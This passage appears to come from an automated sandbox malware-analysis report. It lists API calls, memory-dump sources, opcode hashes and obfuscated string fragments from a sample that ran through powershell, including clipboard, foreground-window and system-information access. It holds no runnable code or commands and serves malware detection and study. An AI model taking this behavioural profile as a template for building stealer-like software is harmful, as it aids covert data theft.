                                                        • GetForegroundWindow.USER32 ref: 00440953
                                                        • GetForegroundWindow.USER32 ref: 00440964
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ForegroundWindow
                                                        • String ID:
                                                        • API String ID: 2020703349-0
                                                        • Opcode ID: af78848e772b2239e71a8543648dbf526b680b3ac221c19b18b434eb311b0419
                                                        • Instruction ID: 506b7b574d8000d809568ce512fb95433625c79aa38ec2c80b2636ebefffc8f4
                                                        • Opcode Fuzzy Hash: af78848e772b2239e71a8543648dbf526b680b3ac221c19b18b434eb311b0419
                                                        • Instruction Fuzzy Hash: 0BD0A7FDA606089BE714D775FC4E4163625DB4325A3040038F80683322EA35D5548D9B
                                                        APIs
                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F5E5
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: InstalledMemoryPhysicallySystem
                                                        • String ID:
                                                        • API String ID: 3960555810-0
                                                        • Opcode ID: 3427f7191c17f93caf67fd26d3365cdac28fb9ccf4f177b5e2cb6d0e58f20142
                                                        • Instruction ID: 159ba8d8b0c5d88003056c6536c7e2755ed42697ab90b258c5c26d0cc94d9d9e
                                                        • Opcode Fuzzy Hash: 3427f7191c17f93caf67fd26d3365cdac28fb9ccf4f177b5e2cb6d0e58f20142
                                                        • Instruction Fuzzy Hash: 0F91F87010C3D08BD7398F2995603ABBFE19FEB308F584A6ED0C997382D77985458B5A
                                                        APIs
                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 004395E7
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: DefaultLanguageUser
                                                        • String ID:
                                                        • API String ID: 95929093-0
                                                        • Opcode ID: f9caa41019bdc740ee0b9345fca91777fd2377a219faf06f30703e9a22e1fe49
                                                        • Instruction ID: 467edc09f1ba4e848d5d9b1be9e32d729257985f786e10be2cd399486c31e036
                                                        • Opcode Fuzzy Hash: f9caa41019bdc740ee0b9345fca91777fd2377a219faf06f30703e9a22e1fe49
                                                        • Instruction Fuzzy Hash: F911C1359092898FCB18CF3889949987BB1AF4F210F09829CD495A73B2DA349801CF11
                                                        APIs
                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B97C,00000000,0040B9F3), ref: 0043FBE2
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: ea23be570b2c7bed78175230878b622bdf25422050e0d399929f7fdd74999bbc
                                                        • Instruction ID: 9489e16964e9fb7facc9dcd584fcf76e8f52ad1eb4b47a7177fc4a86da97fa40
                                                        • Opcode Fuzzy Hash: ea23be570b2c7bed78175230878b622bdf25422050e0d399929f7fdd74999bbc
                                                        • Instruction Fuzzy Hash: 59F0A735558211DBC2001B29BC06B5B36A8EFCF715F111839F80597165DB39E801859E
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(?,00000000,?,?,?,0040B97C,00000000,0040B9F3), ref: 0043E364
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: aabcf06965db8a6cb313eccff249f9b853c0e3688fb80a27591a47d81de5d219
                                                        • Instruction ID: 3f220ddaedc6f7c47158062b06ca4fcab2b43dfc43af3dd450efc66decba050d
                                                        • Opcode Fuzzy Hash: aabcf06965db8a6cb313eccff249f9b853c0e3688fb80a27591a47d81de5d219
                                                        • Instruction Fuzzy Hash: 7FE0DF35201211FBC2200B14AC81FAB7368EF8776AF020875F5009B1208334DC0086F8
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: BlanketProxy
                                                        • String ID:
                                                        • API String ID: 3890896728-0
                                                        • Opcode ID: c9eb08649175a872df546f5f641d5253485211f54f06a38a5030b3e2fa1e5f95
                                                        • Instruction ID: b02ce8e978d5b7cbea22c76cc3643dbabdc3fc1255baf49ffd03c0c2d2972571
                                                        • Opcode Fuzzy Hash: c9eb08649175a872df546f5f641d5253485211f54f06a38a5030b3e2fa1e5f95
                                                        • Instruction Fuzzy Hash: E8F0B7B82087018FD304DF68D1A471ABBF0FB89304F01881CE5959B3A0C7B6A948CF82
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: BlanketProxy
                                                        • String ID:
                                                        • API String ID: 3890896728-0
                                                        • Opcode ID: 6632bee88472e7033e9eedf20592dd1ada7e04483adb8a7a5616a6b0a7c674be
                                                        • Instruction ID: bb8448b7f6d65fbe5549f96c6756b7e2992d9ca22131fe3e0a95bf764f80edd9
                                                        • Opcode Fuzzy Hash: 6632bee88472e7033e9eedf20592dd1ada7e04483adb8a7a5616a6b0a7c674be
                                                        • Instruction Fuzzy Hash: 3AF0DFB42087028FE301CF24C1A471BBBE5BB85304F21890CE0A44B390C3B5AA098FC2
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,64EED067,00408BF4,3P16), ref: 0043E320
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 07770d5bb5f01c5dcaa0a45f92ad5a1b3d8a87d07c803fb70914e7cb9d737e30
                                                        • Instruction ID: 617bae828074deae15c62c61c915eff02f53d1e0adb9ce70b014a5942c375f4e
                                                        • Opcode Fuzzy Hash: 07770d5bb5f01c5dcaa0a45f92ad5a1b3d8a87d07c803fb70914e7cb9d737e30
                                                        • Instruction Fuzzy Hash: 38C04C31045121ABDA502B15FC05B8A7A65EF45365F054495B004A60B28660AC818698
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MetricsSystem
                                                        • String ID: $!mC$$kC$0nC$4jC$7gC$7gC$7gC$7gC$7gC$7gC$7gC$7gC$7gC$7gC$7gC$7gC$7gC$7gC$7gC$7gC$[iC$hC$oC
                                                        • API String ID: 4116985748-735900891
                                                        • Opcode ID: 03293a76d0e6f27956f7f9a2ea98f98e29c2da7ee0dbfc20e54decd9401d8d0f
                                                        • Instruction ID: a953c80ed1e6c9bbb2acaa33acc90adbcd8232e5160da31776cb7d74123fa145
                                                        • Opcode Fuzzy Hash: 03293a76d0e6f27956f7f9a2ea98f98e29c2da7ee0dbfc20e54decd9401d8d0f
                                                        • Instruction Fuzzy Hash: ABA15EB45493849FE3B4DF25C58978BBBE0BB85308F00891EE69C8B254D7B85858DF4B
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                        • String ID: ($+$-$@
                                                        • API String ID: 2832541153-3554917468
                                                        • Opcode ID: eee851d89f25edbbd4ed57898fc4fb552e1e0818d5a6da4c35085ddfd0504238
                                                        • Instruction ID: bdb2d9c2bc841c8f2a3e558f1334c3c1dfa8a214227731b6e41f597273676e0e
                                                        • Opcode Fuzzy Hash: eee851d89f25edbbd4ed57898fc4fb552e1e0818d5a6da4c35085ddfd0504238
                                                        • Instruction Fuzzy Hash: 7741A17110C7828ED304EF7C948935FBEE09B86314F0A8A7EE4D586392C67C8549D7A7
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00424CA8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: *H%N$4D"J$6T!Z$:X|^$_\$f@F
                                                        • API String ID: 237503144-1361110038
                                                        • Opcode ID: 8ac7ac2f9e7e678587a66ed55d269debe78142821aa82d55bbcf853c0d70921d
                                                        • Instruction ID: dddba54aee623b415b6794963dce5371455b21fe8a57bd6e4f0d68f4edd3e921
                                                        • Opcode Fuzzy Hash: 8ac7ac2f9e7e678587a66ed55d269debe78142821aa82d55bbcf853c0d70921d
                                                        • Instruction Fuzzy Hash: A44125366483204BD324CE68DCD17ABF6D3DBC0714F0A853CE9965B3C1DAB999058781
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00429F0A
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00429F8E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: M)k+$|}
                                                        • API String ID: 237503144-2478318621
                                                        • Opcode ID: b9a6b80def3f47ebae461193d2e71339efa368d7ebd3133d7695e6b3ece90ec4
                                                        • Instruction ID: b05ac647b753ddaf48b98f8a1ca3e38e45bc9e951ddf9b4aae43234e18d9c073
                                                        • Opcode Fuzzy Hash: b9a6b80def3f47ebae461193d2e71339efa368d7ebd3133d7695e6b3ece90ec4
                                                        • Instruction Fuzzy Hash: D9D1CF7164C3518FE319CF29989279FBBE6EBC5304F05C82DE4D98B281D678C50A8B96
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042543B
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042549F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: ,`
                                                        • API String ID: 237503144-1926041171
                                                        • Opcode ID: e027edc38b5128ac3d4a3178c995345471f07d50876f942bc85d62e1bbe3fdf0
                                                        • Instruction ID: 54e4daa30bc61da7b8932b174802c42eb33cbcc4fae566a783cd417281a6a74e
                                                        • Opcode Fuzzy Hash: e027edc38b5128ac3d4a3178c995345471f07d50876f942bc85d62e1bbe3fdf0
                                                        • Instruction Fuzzy Hash: EB91F2B5A002159FDB04CF68DC927AEBBB1FB45318F24816DE814AB382D7759803CBD5
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID: %&$<+m $J+,,$YyE^
                                                        • API String ID: 3664257935-3118217799
                                                        • Opcode ID: 04de18d5e7717988b317a29be3d3681703cba6837ef9d0f384e4958e0209fb2f
                                                        • Instruction ID: e8a83bf0ff457ca83ab46c15c4a1bd87fb79e700b67c20d42fc79b42eff2dd7c
                                                        • Opcode Fuzzy Hash: 04de18d5e7717988b317a29be3d3681703cba6837ef9d0f384e4958e0209fb2f
                                                        • Instruction Fuzzy Hash: DE4126B004C3818FE3218F2488A47A77FD0EFA6318F280A5DE5D557392D67945098B67
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042AF90
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042B0E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: 5B3@$dV3T
                                                        • API String ID: 237503144-261990991
                                                        • Opcode ID: 41a03f116edb841ab1c847b718a3ea413a6da15f6eefa77243de8dc73cba9e25
                                                        • Instruction ID: bfba7fa124b1cd7eb740684d17e56cbcd8e2c712ff3b862f9fdbc632ce2c9353
                                                        • Opcode Fuzzy Hash: 41a03f116edb841ab1c847b718a3ea413a6da15f6eefa77243de8dc73cba9e25
                                                        • Instruction Fuzzy Hash: 836141B0A012158FE355CF69C98175ABFA1FB85310F1996ACD4268F7A6C3B88842CFC5
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00416A64
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?,?,?,?), ref: 00416AAE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: H
                                                        • API String ID: 237503144-2852464175
                                                        • Opcode ID: a078ad03460fa1001752d472e64a71f162443adf9e56fe59ad1f2c52834ab9ed
                                                        • Instruction ID: 3afec7151db21522a113372fe6e1d9e90a6c905b004d47a80dd4e46599dd6d9d
                                                        • Opcode Fuzzy Hash: a078ad03460fa1001752d472e64a71f162443adf9e56fe59ad1f2c52834ab9ed
                                                        • Instruction Fuzzy Hash: 7A412D76908751DFD3218B2498007AB77D9AFC6314F06467DE8C897281DB79CD048766
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: H
                                                        • API String ID: 0-2852464175
                                                        • Opcode ID: e1e0cd936cac4c07c33fe60046a000ebc30fb4ab86b89c3c8269044ec52010dc
                                                        • Instruction ID: bc58ff767b7f579af8a017e0aed4a35e82aff95fb835aa70af31edf0e0242aae
                                                        • Opcode Fuzzy Hash: e1e0cd936cac4c07c33fe60046a000ebc30fb4ab86b89c3c8269044ec52010dc
                                                        • Instruction Fuzzy Hash: 03412A7A908751DFD3218B24D8007EB77E9AFC6324F05467DE8C897281DB79DD048BA6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3731144772.00007FFAABE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABE30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_7ffaabe30000_2AZA84BP4AM1TVWCT7DQB9ZWGJA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8>h
                                                        • API String ID: 0-2845980189
                                                        • Opcode ID: 53ea42d17eb22bad41b39856d717ef531fb90dce6413399d15b3e4559a0d5071
                                                        • Instruction ID: c37f123d406ccc5dc6c3ce1e9e8be2a901b9bd33aac22d92190a3984d698d715
                                                        • Opcode Fuzzy Hash: 53ea42d17eb22bad41b39856d717ef531fb90dce6413399d15b3e4559a0d5071
                                                        • Instruction Fuzzy Hash: 1C11B171A0EE858EE3B99368841A7B46BD2DF563D4F0D40BED04EC71E2CD08288983D3
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3729961426.00007FFAABD1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABD1D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_7ffaabd1d000_2AZA84BP4AM1TVWCT7DQB9ZWGJA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75c89b917dbc06d27aa0678d2f8fb5f0e76b236cd7a46fc831a8b84a1d626b94
                                                        • Instruction ID: 4d45d2ca5babca7aa5b074e2ec0eed4cc6e046966cda32e8625781d180ec7f62
                                                        • Opcode Fuzzy Hash: 75c89b917dbc06d27aa0678d2f8fb5f0e76b236cd7a46fc831a8b84a1d626b94
                                                        • Instruction Fuzzy Hash: E041F67140EBC48FE75A8B28A8559523FB0EF57361B0541EFD09CCB1B3D625A84AC7D2
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3731144772.00007FFAABE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABE30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_7ffaabe30000_2AZA84BP4AM1TVWCT7DQB9ZWGJA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e9078fa7141346e724d17394e9492d139e0439bcfe724a614404273f5047ae0
                                                        • Instruction ID: 0cc97f82f9228374b84c0f73c6b18347e6674843d9c20a2fe46834c3614a6452
                                                        • Opcode Fuzzy Hash: 1e9078fa7141346e724d17394e9492d139e0439bcfe724a614404273f5047ae0
                                                        • Instruction Fuzzy Hash: 7BD01762A59C2A0AFBA8B2B8A0117B950C69B88390F4440F5A40DC62CADC5C5C8622D6
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3731144772.00007FFAABE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABE30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_7ffaabe30000_2AZA84BP4AM1TVWCT7DQB9ZWGJA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5f26f1c659bd1cfeb8b8fccdaa9a359e99dd447240ef7f2f2a6592d0451a786d
                                                        • Instruction ID: 91961c250d77f3f4de19667914e3ef72b8754a4dd68f521fdc79c0c31239e91f
                                                        • Opcode Fuzzy Hash: 5f26f1c659bd1cfeb8b8fccdaa9a359e99dd447240ef7f2f2a6592d0451a786d
                                                        • Instruction Fuzzy Hash: 26D0C2A2E0DC6A0AF7A8B2BCD0613B454C1DB88340F4800F9E40DC62C7DC4C5CC61392